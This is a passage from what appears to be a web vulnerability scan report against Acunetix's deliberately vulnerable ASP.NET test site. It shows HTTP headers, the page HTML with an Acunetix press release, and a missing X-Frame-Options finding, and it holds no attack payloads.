Z2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
